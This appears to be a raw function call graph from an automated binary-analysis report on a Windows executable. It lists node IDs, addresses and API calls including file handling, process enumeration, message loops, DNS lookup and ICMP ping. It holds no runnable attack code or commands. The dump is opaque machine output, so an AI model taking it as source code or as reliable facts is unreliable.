messages 102452->102455 102453 e42512 102460 e41ff7 messages 102453->102460 102470 e4be08 39 API calls 102453->102470 102455->102453 102457 e87837 102455->102457 102458 e8766b 102455->102458 102455->102460 102468 e4e322 8 API calls messages 102455->102468 102457->102460 102469 e5d2d5 39 API calls 102457->102469 102467 e5d2d5 39 API calls 102458->102467 102460->102444 102462->102444 102463->102446 102464->102441 102465->102441 102466->102441 102467->102458 102468->102455 102469->102460 102470->102460 102472 e5014b ___std_exception_copy 102471->102472 102473 e5016a 102472->102473 102476 e5016c 102472->102476 102480 e5521d 7 API calls 2 library calls 102472->102480 102473->102448 102475 e509dd 102482 e53614 RaiseException 102475->102482 102476->102475 102481 e53614 RaiseException 102476->102481 102478 e509fa 102478->102448 102480->102472 102481->102475 102482->102478 102483 e68782 102488 e6853e 102483->102488 102487 e687aa 102491 e6856f try_get_first_available_module 102488->102491 102490 e6876e 102507 e62b5c 26 API calls pre_c_initialization 102490->102507 102499 e686b8 102491->102499 102503 e5917b 40 API calls 2 library calls 102491->102503 102493 e686c3 102493->102487 102500 e70d04 102493->102500 102495 e6870c 102495->102499 102504 e5917b 40 API calls 2 library calls 102495->102504 102497 e6872b 102497->102499 102505 e5917b 40 API calls 2 library calls 102497->102505 102499->102493 102506 e5f649 20 API calls _abort 102499->102506 102508 e70401 102500->102508 102502 e70d1f 102502->102487 102503->102495 102504->102497 102505->102499 102506->102490 102507->102493 102511 e7040d CallCatchBlock 102508->102511 102509 e7041b 102566 e5f649 20 API calls _abort 102509->102566 102511->102509 102513 e70454 102511->102513 102512 e70420 102567 e62b5c 26 API calls pre_c_initialization 102512->102567 102519 e709db 102513->102519 102518 e7042a __fread_nolock 102518->102502 102569 e707af 102519->102569 102522 e70a26 102587 e65594 102522->102587 102523 e70a0d 102601 e5f636 20 API calls _abort 102523->102601 102526 e70a12 102602 e5f649 20 API calls _abort 102526->102602 102527 e70a2b 102528 e70a34 102527->102528 102529 e70a4b 102527->102529 102603 e5f636 20 API calls _abort 102528->102603 102600 e7071a CreateFileW 102529->102600 102533 e70a39 102604 e5f649 20 API calls _abort 102533->102604 102534 e70b01 GetFileType 102537 e70b53 102534->102537 102538 e70b0c GetLastError 102534->102538 102536 e70ad6 GetLastError 102606 e5f613 20 API calls 2 library calls 102536->102606 102609 e654dd 21 API calls 3 library calls 102537->102609 102607 e5f613 20 API calls 2 library calls 102538->102607 102539 e70a84 102539->102534 102539->102536 102605 e7071a CreateFileW 102539->102605 102543 e70b1a CloseHandle 102543->102526 102544 e70b43 102543->102544 102608 e5f649 20 API calls _abort 102544->102608 102546 e70ac9 102546->102534 102546->102536 102548 e70b48 102548->102526 102549 e70b74 102552 e70bc0 102549->102552 102610 e7092b 72 API calls 4 library calls 102549->102610 102555 e70bed 102552->102555 102611 e704cd 72 API calls 4 library calls 102552->102611 102553 e70be6 102554 e70bfe 102553->102554 102553->102555 102557 e70478 102554->102557 102558 e70c7c CloseHandle 102554->102558 102612 e68a2e 102555->102612 102568 e704a1 LeaveCriticalSection __wsopen_s 102557->102568 102627 e7071a CreateFileW 102558->102627 102560 e70ca7 102561 e70cdd 102560->102561 102562 e70cb1 GetLastError 102560->102562 102561->102557 102628 e5f613 20 API calls 2 library calls 102562->102628 102564 e70cbd 102629 e656a6 21 API calls 3 library calls 102564->102629 102566->102512 102567->102518 102568->102518 102570 e707d0 102569->102570 102575 e707ea 102569->102575 102570->102575 102637 e5f649 20 API calls _abort 102570->102637 102573 e707df 102638 e62b5c 26 API calls pre_c_initialization 102573->102638 102630 e7073f 102575->102630 102576 e70851 102586 e708a4 102576->102586 102641 e5da7d 26 API calls 2 library calls 102576->102641 102577 e70822 102577->102576 102639 e5f649 20 API calls _abort 102577->102639 102580 e7089f 102583 e7091e 102580->102583 102580->102586 102581 e70846 102640 e62b5c 26 API calls pre_c_initialization 102581->102640 102642 e62b6c 11 API calls _abort 102583->102642 102585 e7092a 102586->102522 102586->102523 102588 e655a0 CallCatchBlock 102587->102588 102645 e632d1 EnterCriticalSection 102588->102645 102590 e655a7 102591 e655cc 102590->102591 102596 e6563a EnterCriticalSection 102590->102596 102598 e655ee 102590->102598 102649 e65373 21 API calls 3 library calls 102591->102649 102594 e65617 __fread_nolock 102594->102527 102595 e655d1 102595->102598 102650 e654ba EnterCriticalSection 102595->102650 102597 e65647 LeaveCriticalSection 102596->102597 102596->102598 102597->102590 102646 e6569d 102598->102646 102600->102539 102601->102526 102602->102557 102603->102533 102604->102526 102605->102546 102606->102526 102607->102543 102608->102548 102609->102549 102610->102552 102611->102553 102652 e65737 102612->102652 102614 e68a44 102665 e656a6 21 API calls 3 library calls 102614->102665 102616 e68a3e 102616->102614 102618 e65737 __wsopen_s 26 API calls 102616->102618 102626 e68a76 102616->102626 102617 e65737 __wsopen_s 26 API calls 102619 e68a82 CloseHandle 102617->102619 102622 e68a6d 102618->102622 102619->102614 102624 e68a8e GetLastError 102619->102624 102620 e68abe 102620->102557 102621 e68a9c 102621->102620 102666 e5f613 20 API calls 2 library calls 102621->102666 102623 e65737 __wsopen_s 26 API calls 102622->102623 102623->102626 102624->102614 102626->102614 102626->102617 102627->102560 102628->102564 102629->102561 102632 e70757 102630->102632 102631 e70772 102631->102577 102632->102631 102643 e5f649 20 API calls _abort 102632->102643 102634 e70796 102644 e62b5c 26 API calls pre_c_initialization 102634->102644 102636 e707a1 102636->102577 102637->102573 102638->102575 102639->102581 102640->102576 102641->102580 102642->102585 102643->102634 102644->102636 102645->102590 102651 e63319 LeaveCriticalSection 102646->102651 102648 e656a4 102648->102594 102649->102595 102650->102598 102651->102648 102653 e65744 102652->102653 102654 e65759 102652->102654 102667 e5f636 20 API calls _abort 102653->102667 102658 e6577e 102654->102658 102669 e5f636 20 API calls _abort 102654->102669 102657 e65749 102668 e5f649 20 API calls _abort 102657->102668 102658->102616 102659 e65789 102670 e5f649 20 API calls _abort 102659->102670 102662 e65791 102671 e62b5c 26 API calls pre_c_initialization 102662->102671 102663 e65751 102663->102616 102665->102621 102666->102620 102667->102657 102668->102663 102669->102659 102670->102662 102671->102663 102672 e3f5e5 102675 e3cab0 102672->102675 102676 e3cacb 102675->102676 102677 e8150c 102676->102677 102678 e814be 102676->102678 102701 e3caf0 102676->102701 102724 eb62ff 207 API calls 2 library calls 102677->102724 102681 e814c8 102678->102681 102684 e814d5 102678->102684 102678->102701 102722 eb6790 207 API calls 102681->102722 102697 e3cdc0 102684->102697 102723 eb6c2d 207 API calls 2 library calls 102684->102723 102688 e8179f 102688->102688 102689 e4e807 39 API calls 102689->102701 102691 e3cdee 102693 e816e8 102730 eb6669 81 API calls 102693->102730 102697->102691 102731 ea3fe1 81 API calls __wsopen_s 102697->102731 102701->102689 102701->102691 102701->102693 102701->102697 102702 e3cf80 39 API calls 102701->102702 102703 e40340 207 API calls 102701->102703 102704 e3bed9 8 API calls 102701->102704 102706 e3be2d 102701->102706 102710 e4e7c1 39 API calls 102701->102710 102711 e4aa99 207 API calls 102701->102711 102712 e505b2 5 API calls __Init_thread_wait 102701->102712 102713 e4bc58 102701->102713 102718 e50413 29 API calls __onexit 102701->102718 102719 e50568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102701->102719 102720 e4f4df 81 API calls 102701->102720 102721 e4f346 207 API calls 102701->102721 102725 e3b4c8 102701->102725 102729 e8ffaf 8 API calls 102701->102729 102702->102701 102703->102701 102704->102701 102707 e3be38 102706->102707 102708 e3be67 102707->102708 102732 e3bfa5 102707->102732 102708->102701 102710->102701 102711->102701 102712->102701 102714 e5014b 8 API calls 102713->102714 102715 e4bc65 102714->102715 102778 e3b329 102715->102778 102718->102701 102719->102701 102720->102701 102721->102701 102722->102684 102723->102697 102724->102701 102726 e3b4dc 102725->102726 102727 e3b4d6 102725->102727 102726->102701 102727->102726 102728 e3bed9 8 API calls 102727->102728 102728->102726 102729->102701 102730->102697 102731->102688 102749 e3cf80 102732->102749 102734 e3bfb5 102735 e3bfc3 102734->102735 102736 e80db6 102734->102736 102757 e5014b 102735->102757 102737 e3b4c8 8 API calls 102736->102737 102740 e80dc1 102737->102740 102739 e3bfd4 102766 e3bf73 102739->102766 102743 e3bfed 102745 e5014b 8 API calls 102743->102745 102744 e3bed9 8 API calls 102744->102743 102746 e3bff7 102745->102746 102771 e3be7b 39 API calls 102746->102771 102748 e3c01b 102748->102708 102750 e3d1c7 102749->102750 102755 e3cf93 102749->102755 102750->102734 102752 e3bf73 8 API calls 102752->102755 102753 e3d03d 102753->102734 102755->102752 102755->102753 102772 e505b2 5 API calls __Init_thread_wait 102755->102772 102773 e50413 29 API calls __onexit 102755->102773 102774 e50568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102755->102774 102760 e50150 ___std_exception_copy 102757->102760 102758 e5016a 102758->102739 102760->102758 102762 e5016c 102760->102762 102775 e5521d 7 API calls 2 library calls 102760->102775 102761 e509dd 102777 e53614 RaiseException 102761->102777 102762->102761 102776 e53614 RaiseException 102762->102776 102764 e509fa 102764->102739 102767 e5017b 8 API calls 102766->102767 102768 e3bf88 102767->102768 102769 e5014b 8 API calls 102768->102769 102770 e3bf96 102769->102770 102770->102743 102770->102744 102771->102748 102772->102755 102773->102755 102774->102755 102775->102760 102776->102761 102777->102764 102779 e3b338 _wcslen 102778->102779 102780 e5017b 8 API calls 102779->102780 102781 e3b360 __fread_nolock 102780->102781 102782 e5014b 8 API calls 102781->102782 102783 e3b376 102782->102783 102783->102701 102784 e31044 102789 e32793 102784->102789 102786 e3104a 102825 e50413 29 API calls __onexit 102786->102825 102788 e31054 102826 e32a38 102789->102826 102793 e3280a 102794 e3bf73 8 API calls 102793->102794 102795 e32814 102794->102795 102796 e3bf73 8 API calls 102795->102796 102797 e3281e 102796->102797 102798 e3bf73 8 API calls 102797->102798 102799 e32828 102798->102799 102800 e3bf73 8 API calls 102799->102800 102801 e32866 102800->102801 102802 e3bf73 8 API calls 102801->102802 102803 e32932 102802->102803 102836 e32dbc 102803->102836 102807 e32964 102808 e3bf73 8 API calls 102807->102808 102809 e3296e 102808->102809 102863 e43160 102809->102863 102811 e32999 102873 e33166 102811->102873 102813 e329b5 102814 e329c5 GetStdHandle 102813->102814 102815 e739e7 102814->102815 102816 e32a1a 102814->102816 102815->102816 102817 e739f0 102815->102817 102819 e32a27 OleInitialize 102816->102819 102818 e5014b 8 API calls 102817->102818 102820 e739f7 102818->102820 102819->102786 102880 ea0ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 102820->102880 102822 e73a00 102881 ea12eb CreateThread 102822->102881 102824 e73a0c CloseHandle 102824->102816 102825->102788 102882 e32a91 102826->102882 102829 e32a91 8 API calls 102830 e32a70 102829->102830 102831 e3bf73 8 API calls 102830->102831 102832 e32a7c 102831->102832 102889 e38577 102832->102889 102834 e327c9 102835 e3327e 6 API calls 102834->102835 102835->102793 102837 e3bf73 8 API calls 102836->102837 102838 e32dcc 102837->102838 102839 e3bf73 8 API calls 102838->102839 102840 e32dd4 102839->102840 102912 e381d6 102840->102912 102843 e381d6 8 API calls 102844 e32de4 102843->102844 102845 e3bf73 8 API calls 102844->102845 102846 e32def 102845->102846 102847 e5014b 8 API calls 102846->102847 102848 e3293c 102847->102848 102849 e33205 102848->102849 102850 e33213 102849->102850 102851 e3bf73 8 API calls 102850->102851 102852 e3321e 102851->102852 102853 e3bf73 8 API calls 102852->102853 102854 e33229 102853->102854 102855 e3bf73 8 API calls 102854->102855 102856 e33234 102855->102856 102857 e3bf73 8 API calls 102856->102857 102858 e3323f 102857->102858 102859 e381d6 8 API calls 102858->102859 102860 e3324a 102859->102860 102861 e5014b 8 API calls 102860->102861 102862 e33251 RegisterWindowMessageW 102861->102862 102862->102807 102864 e431a1 102863->102864 102865 e4317d 102863->102865 102915 e505b2 5 API calls __Init_thread_wait 102864->102915 102872 e4318e 102865->102872 102917 e505b2 5 API calls __Init_thread_wait 102865->102917 102868 e431ab 102868->102865 102916 e50568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102868->102916 102869 e49f47 102869->102872 102918 e50568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102869->102918 102872->102811 102874 e33176 102873->102874 102875 e73c8f 102873->102875 102876 e5014b 8 API calls 102874->102876 102919 ea3c4e 8 API calls 102875->102919 102879 e3317e 102876->102879 102878 e73c9a 102879->102813 102880->102822 102881->102824 102920 ea12d1 14 API calls 102881->102920 102883 e3bf73 8 API calls 102882->102883 102884 e32a9c 102883->102884 102885 e3bf73 8 API calls 102884->102885 102886 e32aa4 102885->102886 102887 e3bf73 8 API calls 102886->102887 102888 e32a66 102887->102888 102888->102829 102890 e38587 _wcslen 102889->102890 102891 e76610 102889->102891 102894 e385c2 102890->102894 102895 e3859d 102890->102895 102902 e3adf4 102891->102902 102893 e76619 102893->102893 102897 e5014b 8 API calls 102894->102897 102901 e388e8 8 API calls 102895->102901 102898 e385ce 102897->102898 102900 e5017b 8 API calls 102898->102900 102899 e385a5 __fread_nolock 102899->102834 102900->102899 102901->102899 102903 e3ae02 102902->102903 102905 e3ae0b __fread_nolock 102902->102905 102903->102905 102906 e3c2c9 102903->102906 102905->102893 102907 e3c2d9 __fread_nolock 102906->102907 102908 e3c2dc 102906->102908 102907->102905 102909 e5014b 8 API calls 102908->102909 102910 e3c2e7 102909->102910 102911 e5017b 8 API calls 102910->102911 102911->102907 102913 e3bf73 8 API calls 102912->102913 102914 e32ddc 102913->102914 102914->102843 102915->102868 102916->102865 102917->102869 102918->102872 102919->102878 102921 e8400f 102936 e3eeb0 messages 102921->102936 102922 e3f211 PeekMessageW 102922->102936 102923 e3ef07 GetInputState 102923->102922 102923->102936 102924 e3f0d5 102925 e832cd TranslateAcceleratorW 102925->102936 102927 e3f273 TranslateMessage DispatchMessageW 102928 e3f28f PeekMessageW 102927->102928 102928->102936 102929 e3f104 timeGetTime 102929->102936 102930 e3f2af Sleep 102947 e3f2c0 102930->102947 102931 e84183 Sleep 102931->102947 102932 e4f215 timeGetTime 102932->102947 102933 e833e9 timeGetTime 103049 e4aa65 9 API calls 102933->103049 102936->102922 102936->102923 102936->102924 102936->102925 102936->102927 102936->102928 102936->102929 102936->102930 102936->102931 102936->102933 102950 e40340 207 API calls 102936->102950 102953 e3f450 102936->102953 102960 e3f6d0 102936->102960 102983 e42b20 102936->102983 103044 e4e915 102936->103044 103050 ea446f 8 API calls 102936->103050 103051 ea3fe1 81 API calls __wsopen_s 102936->103051 102937 e8421a GetExitCodeProcess 102941 e84230 WaitForSingleObject 102937->102941 102942 e84246 CloseHandle 102937->102942 102938 ec345b GetForegroundWindow 102938->102947 102940 e83d51 102943 e83d59 102940->102943 102941->102936 102941->102942 102942->102947 102944 e842b8 Sleep 102944->102936 102947->102932 102947->102936 102947->102937 102947->102938 102947->102940 102947->102944 103052 eb60b5 8 API calls 102947->103052 103053 e9f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 102947->103053 103054 e9dd87 CreateToolhelp32Snapshot Process32FirstW 102947->103054 102950->102936 102954 e3f483 102953->102954 102955 e3f46f 102953->102955 103096 ea3fe1 81 API calls __wsopen_s 102954->103096 103064 e3e960 102955->103064 102958 e3f47a 102958->102936 102959 e84584 102959->102959 102961 e3f6ef 102960->102961 102977 e3f7dc messages 102961->102977 103113 e505b2 5 API calls __Init_thread_wait 102961->103113 102963 ea3fe1 81 API calls 102963->102977 102965 e845d9 102967 e3bf73 8 API calls 102965->102967 102965->102977 102966 e3bf73 8 API calls 102966->102977 102968 e845f3 102967->102968 103114 e50413 29 API calls __onexit 102968->103114 102969 e3be2d 39 API calls 102969->102977 102972 e845fd 103115 e50568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102972->103115 102976 e3bed9 8 API calls 102976->102977 102977->102963 102977->102966 102977->102969 102977->102976 102978 e40340 207 API calls 102977->102978 102979 e3fae1 102977->102979 102980 e41ca0 8 API calls 102977->102980 103112 e4b35c 207 API calls 102977->103112 103116 e505b2 5 API calls __Init_thread_wait 102977->103116 103117 e50413 29 API calls __onexit 102977->103117 103118 e50568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102977->103118 103119 eb5231 101 API calls 102977->103119 103120 eb731e 207 API calls 102977->103120 102978->102977 102979->102936 102980->102977 102984 e42b86 102983->102984 102985 e42fc0 102983->102985 102987 e87bd8 102984->102987 102988 e42ba0 102984->102988 103323 e505b2 5 API calls __Init_thread_wait 102985->103323 103286 eb7af9 102987->103286 102991 e43160 9 API calls 102988->102991 102990 e42fca 102994 e3b329 8 API calls 102990->102994 102999 e4300b 102990->102999 102993 e42bb0 102991->102993 102992 e87be4 102992->102936 102995 e43160 9 API calls 102993->102995 103005 e42fe4 102994->103005 102996 e42bc6 102995->102996 102998 e42bfc 102996->102998 102996->102999 102997 e87bed 102997->102936 103000 e87bfd 102998->103000 103008 e42c18 __fread_nolock 102998->103008 102999->102997 103001 e3b4c8 8 API calls 102999->103001 103327 ea3fe1 81 API calls __wsopen_s 103000->103327 103003 e43049 103001->103003 103325 e4e6e8 207 API calls 103003->103325 103004 e42dd7 messages 103017 e43082 103004->103017 103025 e42e8b messages 103004->103025 103030 e43160 9 API calls 103004->103030 103121 eba6aa 103004->103121 103129 eb9fe8 103004->103129 103132 eb9ffc 103004->103132 103135 eba5b2 103004->103135 103141 e38bda 103004->103141 103216 ebad47 103004->103216 103221 e4ac3e 103004->103221 103240 eaf94a 103004->103240 103249 eadf45 103004->103249 103254 eb0fb8 103004->103254 103279 ea664c 103004->103279 103331 ea3fe1 81 API calls __wsopen_s 103004->103331 103324 e50568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103005->103324 103007 e87c15 103328 ea3fe1 81 API calls __wsopen_s 103007->103328 103008->103003 103008->103004 103008->103007 103016 e5014b 8 API calls 103008->103016 103018 e5017b 8 API calls 103008->103018 103024 e40340 207 API calls 103008->103024 103026 e42d3f 103008->103026 103029 e87c59 103008->103029 103011 e87c78 103330 eb61a2 53 API calls _wcslen 103011->103330 103012 e42d4c 103013 e43160 9 API calls 103012->103013 103015 e42d59 103013->103015 103015->103004 103021 e43160 9 API calls 103015->103021 103016->103008 103326 e4fe39 8 API calls 103017->103326 103018->103008 103020 e42f2d 103020->102936 103028 e42d73 103021->103028 103022 e430bd 103022->102936 103024->103008 103025->103020 103322 e4e322 8 API calls messages 103025->103322 103026->103011 103026->103012 103028->103004 103032 e3bed9 8 API calls 103028->103032 103329 ea3fe1 81 API calls __wsopen_s 103029->103329 103030->103004 103032->103004 103045 e4e959 103044->103045 103046 e4e928 103044->103046 103045->102936 103046->103045 103047 e4e94c IsDialogMessageW 103046->103047 103048 e8eff6 GetClassLongW 103046->103048 103047->103045 103047->103046 103048->103046 103048->103047 103049->102936 103050->102936 103051->102936 103052->102947 103053->102947 103874 e9e80e 103054->103874 103056 e9ddd4 Process32NextW 103057 e9de86 CloseHandle 103056->103057 103061 e9ddcd 103056->103061 103057->102947 103058 e3bf73 8 API calls 103058->103061 103059 e3b329 8 API calls 103059->103061 103060 e3568e 8 API calls 103060->103061 103061->103056 103061->103057 103061->103058 103061->103059 103061->103060 103062 e37bb5 8 API calls 103061->103062 103880 e4e36b 41 API calls 103061->103880 103062->103061 103065 e40340 207 API calls 103064->103065 103083 e3e99d 103065->103083 103066 e831d3 103110 ea3fe1 81 API calls __wsopen_s 103066->103110 103068 e3ea0b messages 103068->102958 103069 e3edd5 103069->103068 103079 e5017b 8 API calls 103069->103079 103070 e3eac3 103070->103069 103072 e3eace 103070->103072 103071 e3ecff 103075 e3ed14 103071->103075 103076 e831c4 103071->103076 103074 e5014b 8 API calls 103072->103074 103073 e3ebb8 103081 e5017b 8 API calls 103073->103081 103080 e3ead5 __fread_nolock 103074->103080 103077 e5014b 8 API calls 103075->103077 103109 eb6162 8 API calls 103076->103109 103089 e3eb6a 103077->103089 103079->103080 103082 e3eaf6 103080->103082 103084 e5014b 8 API calls 103080->103084 103091 e3eb29 __fread_nolock messages 103081->103091 103082->103091 103097 e3d260 103082->103097 103083->103066 103083->103068 103083->103069 103083->103070 103083->103073 103085 e5014b 8 API calls 103083->103085 103083->103091 103084->103082 103085->103083 103087 e831b3 103108 ea3fe1 81 API calls __wsopen_s 103087->103108 103089->102958 103091->103071 103091->103087 103091->103089 103092 e8318e 103091->103092 103094 e8316c 103091->103094 103105 e344fe 207 API calls 103091->103105 103107 ea3fe1 81 API calls __wsopen_s 103092->103107 103106 ea3fe1 81 API calls __wsopen_s 103094->103106 103096->102959 103098 e3d2c6 103097->103098 103099 e3d29a 103097->103099 103101 e40340 207 API calls 103098->103101 103100 e3f6d0 207 API calls 103099->103100 103102 e3d2a0 103099->103102 103100->103102 103103 e8184b 103101->103103 103102->103091 103102->103102 103103->103102 103111 ea3fe1 81 API calls __wsopen_s 103103->103111 103105->103091 103106->103089 103107->103089 103108->103089 103109->103066 103110->103068 103111->103102 103112->102977 103113->102965 103114->102972 103115->102977 103116->102977 103117->102977 103118->102977 103119->102977 103120->102977 103123 eba705 103121->103123 103128 eba6c5 103121->103128 103122 eba723 103124 e3c98d 39 API calls 103122->103124 103126 eba780 103122->103126 103122->103128 103123->103122 103364 e3c98d 103123->103364 103124->103126 103332 ea0372 103126->103332 103128->103004 103436 eb89b6 103129->103436 103131 eb9ff8 103131->103004 103133 eb89b6 119 API calls 103132->103133 103134 eba00c 103133->103134 103134->103004 103136 eba5c5 103135->103136 103137 e38ec0 52 API calls 103136->103137 103140 eba5d4 103136->103140 103138 eba632 103137->103138 103561 ea18a9 103138->103561 103140->103004 103142 e38ec0 52 API calls 103141->103142 103143 e38bf9 103142->103143 103144 e38ec0 52 API calls 103143->103144 103145 e38c0e 103144->103145 103146 e38ec0 52 API calls 103145->103146 103147 e38c21 103146->103147 103148 e38ec0 52 API calls 103147->103148 103149 e38c37 103148->103149 103605 e37ad5 103149->103605 103152 e76767 103155 e37e12 8 API calls 103152->103155 103153 e3c98d 39 API calls 103154 e38c72 103153->103154 103154->103152 103184 e38c98 try_get_first_available_module 103154->103184 103156 e76786 103155->103156 103157 e38470 8 API calls 103156->103157 103158 e76798 103157->103158 103163 e38a60 8 API calls 103158->103163 103189 e767bd 103158->103189 103159 e37e12 8 API calls 103160 e38d4e 103159->103160 103164 e76873 103160->103164 103165 e38d5c 103160->103165 103161 e38d3c 103161->103159 103162 e38ec0 52 API calls 103167 e38d27 103162->103167 103163->103189 103170 e7687d 103164->103170 103171 e768bc 103164->103171 103168 e38d71 103165->103168 103169 e7696e 103165->103169 103172 e38ec0 52 API calls 103167->103172 103174 e38470 8 API calls 103168->103174 103176 e38470 8 API calls 103169->103176 103177 e38470 8 API calls 103170->103177 103173 e38470 8 API calls 103171->103173 103172->103161 103178 e768c5 103173->103178 103179 e38d79 103174->103179 103175 e3893c 8 API calls 103175->103189 103180 e7697b 103176->103180 103181 e76885 103177->103181 103182 e38a60 8 API calls 103178->103182 103613 e3bd57 103179->103613 103186 e38a60 8 API calls 103180->103186 103187 e38ec0 52 API calls 103181->103187 103188 e768e1 103182->103188 103184->103161 103184->103162 103211 e38d91 try_get_first_available_module 103184->103211 103185 e38a60 8 API calls 103185->103189 103186->103211 103190 e76897 103187->103190 103195 e38ec0 52 API calls 103188->103195 103189->103175 103189->103185 103214 e38e71 103189->103214 103631 e38844 8 API calls __fread_nolock 103189->103631 103632 e38844 8 API calls __fread_nolock 103190->103632 103193 e768ab 103194 e3893c 8 API calls 103193->103194 103196 e768b9 103194->103196 103198 e768fc 103195->103198 103202 e38a60 8 API calls 103196->103202 103197 e3893c 8 API calls 103197->103211 103633 e38844 8 API calls __fread_nolock 103198->103633 103199 e769f1 103610 e3893c 103199->103610 103200 e769c1 103200->103199 103203 e769e5 103200->103203 103202->103214 103634 e3ad40 8 API calls __fread_nolock 103203->103634 103206 e76910 103209 e3893c 8 API calls 103206->103209 103209->103196 103210 e769ef 103211->103197 103211->103200 103211->103214 103619 e38844 8 API calls __fread_nolock 103211->103619 103620 e38a60 103211->103620 103212 e38a60 8 API calls 103213 e76a12 103212->103213 103215 e3bd57 8 API calls 103213->103215 103214->103004 103215->103210 103217 e38ec0 52 API calls 103216->103217 103218 ebad63 103217->103218 103219 e9dd87 46 API calls 103218->103219 103220 ebad72 103219->103220 103220->103004 103222 e38ec0 52 API calls 103221->103222 103223 e4ac68 103222->103223 103224 e4bc58 8 API calls 103223->103224 103225 e4ac7f 103224->103225 103226 e3c98d 39 API calls 103225->103226 103235 e4b09b _wcslen 103225->103235 103226->103235 103227 e4bbbe 43 API calls 103227->103235 103228 e54d98 40 API calls 103228->103235 103229 e37ad5 8 API calls 103229->103235 103232 e36c03 8 API calls 103232->103235 103233 e3c98d 39 API calls 103233->103235 103234 e4b1fb 103234->103004 103235->103227 103235->103228 103235->103229 103235->103232 103235->103233 103235->103234 103236 e38ec0 52 API calls 103235->103236 103237 e38577 8 API calls 103235->103237 103636 e3396b 103235->103636 103646 e33907 103235->103646 103650 e3ad40 8 API calls __fread_nolock 103235->103650 103651 e37b1a 8 API calls 103235->103651 103236->103235 103237->103235 103241 e5017b 8 API calls 103240->103241 103242 eaf95b 103241->103242 103733 e3423c 103242->103733 103245 e38ec0 52 API calls 103246 eaf97c GetEnvironmentVariableW 103245->103246 103736 ea160f 8 API calls 103246->103736 103248 eaf999 messages 103248->103004 103250 e3b4c8 8 API calls 103249->103250 103251 eadf58 103250->103251 103737 ea1926 103251->103737 103253 eadf60 103253->103004 103255 eb0fe1 103254->103255 103256 eb100f WSAStartup 103255->103256 103258 e3c98d 39 API calls 103255->103258 103257 eb1054 103256->103257 103269 eb1023 messages 103256->103269 103767 e4c1f6 103257->103767 103260 eb0ffc 103258->103260 103260->103256 103263 e3c98d 39 API calls 103260->103263 103262 e38ec0 52 API calls 103264 eb1069 103262->103264 103265 eb100b 103263->103265 103266 e4f9d4 10 API calls 103264->103266 103265->103256 103267 eb1075 inet_addr gethostbyname 103266->103267 103268 eb1093 IcmpCreateFile 103267->103268 103267->103269 103268->103269 103270 eb10d3 103268->103270 103269->103004 103271 e5017b 8 API calls 103270->103271 103272 eb10ec 103271->103272 103273 e3423c 8 API calls 103272->103273 103274 eb10f7 103273->103274 103275 eb112b IcmpSendEcho 103274->103275 103276 eb1102 IcmpSendEcho 103274->103276 103277 eb114c 103275->103277 103276->103277 103278 eb1212 IcmpCloseHandle WSACleanup 103277->103278 103278->103269 103280 e38ec0 52 API calls 103279->103280 103281 ea6662 103280->103281 103772 e9dc54 103281->103772 103283 ea666a 103284 ea666e GetLastError 103283->103284 103285 ea6683 103283->103285 103284->103285 103285->103004 103287 eb7b38 103286->103287 103288 eb7b52 103286->103288 103868 ea3fe1 81 API calls __wsopen_s 103287->103868 103857 eb60e6 103288->103857 103292 e40340 206 API calls 103293 eb7bc1 103292->103293 103294 eb7c5c 103293->103294 103298 eb7c03 103293->103298 103317 eb7b4a 103293->103317 103295 eb7c62 103294->103295 103296 eb7cb0 103294->103296 103869 ea1ad8 8 API calls 103295->103869 103297 e38ec0 52 API calls 103296->103297 103296->103317 103299 eb7cc2 103297->103299 103303 ea148b 8 API calls 103298->103303 103301 e3c2c9 8 API calls 103299->103301 103304 eb7ce6 CharUpperBuffW 103301->103304 103302 eb7c85 103870 e3bd07 8 API calls 103302->103870 103306 eb7c3b 103303->103306 103308 eb7d00 103304->103308 103307 e42b20 206 API calls 103306->103307 103307->103317 103309 eb7d53 103308->103309 103310 eb7d07 103308->103310 103311 e38ec0 52 API calls 103309->103311 103864 ea148b 103310->103864 103312 eb7d5b 103311->103312 103871 e4aa65 9 API calls 103312->103871 103316 e42b20 206 API calls 103316->103317 103317->102992 103318 eb7d65 103318->103317 103319 e38ec0 52 API calls 103318->103319 103320 eb7d80 103319->103320 103872 e3bd07 8 API calls 103320->103872 103322->103025 103323->102990 103324->102999 103325->103017 103326->103022 103327->103004 103328->103004 103329->103004 103330->103028 103331->103004 103369 ea02aa 103332->103369 103335 ea040b 103338 ea0471 103335->103338 103339 ea041b 103335->103339 103336 ea03f3 103385 ea05e9 56 API calls __fread_nolock 103336->103385 103340 ea04a1 103338->103340 103341 ea0507 103338->103341 103354 ea0399 __fread_nolock 103338->103354 103363 ea0453 103339->103363 103386 ea2855 10 API calls 103339->103386 103344 ea04d1 103340->103344 103345 ea04a6 103340->103345 103342 ea05b0 103341->103342 103343 ea0510 103341->103343 103342->103354 103394 e3c63f 39 API calls 103342->103394 103346 ea058d 103343->103346 103347 ea0515 103343->103347 103344->103354 103390 e3ca5b 39 API calls 103344->103390 103345->103354 103389 e3ca5b 39 API calls 103345->103389 103346->103354 103393 e3c63f 39 API calls 103346->103393 103355 ea0554 103347->103355 103357 ea051b 103347->103357 103354->103128 103355->103354 103392 e3c63f 39 API calls 103355->103392 103356 ea0427 103387 ea2855 10 API calls 103356->103387 103357->103354 103391 e3c63f 39 API calls 103357->103391 103361 ea043e __fread_nolock 103388 ea2855 10 API calls 103361->103388 103376 ea1844 103363->103376 103365 e3c99e 103364->103365 103366 e3c9a5 103364->103366 103365->103366 103435 e56641 39 API calls 103365->103435 103366->103122 103368 e3c9e8 103368->103122 103370 ea02f7 103369->103370 103375 ea02bb 103369->103375 103371 e3c98d 39 API calls 103370->103371 103373 ea02f5 103371->103373 103373->103335 103373->103336 103373->103354 103375->103373 103395 e38ec0 103375->103395 103418 e54d98 103375->103418 103377 ea184f 103376->103377 103378 e5014b 8 API calls 103377->103378 103379 ea1856 103378->103379 103380 ea1862 103379->103380 103381 ea1883 103379->103381 103383 e5017b 8 API calls 103380->103383 103382 e5017b 8 API calls 103381->103382 103384 ea186b ___scrt_fastfail 103382->103384 103383->103384 103384->103354 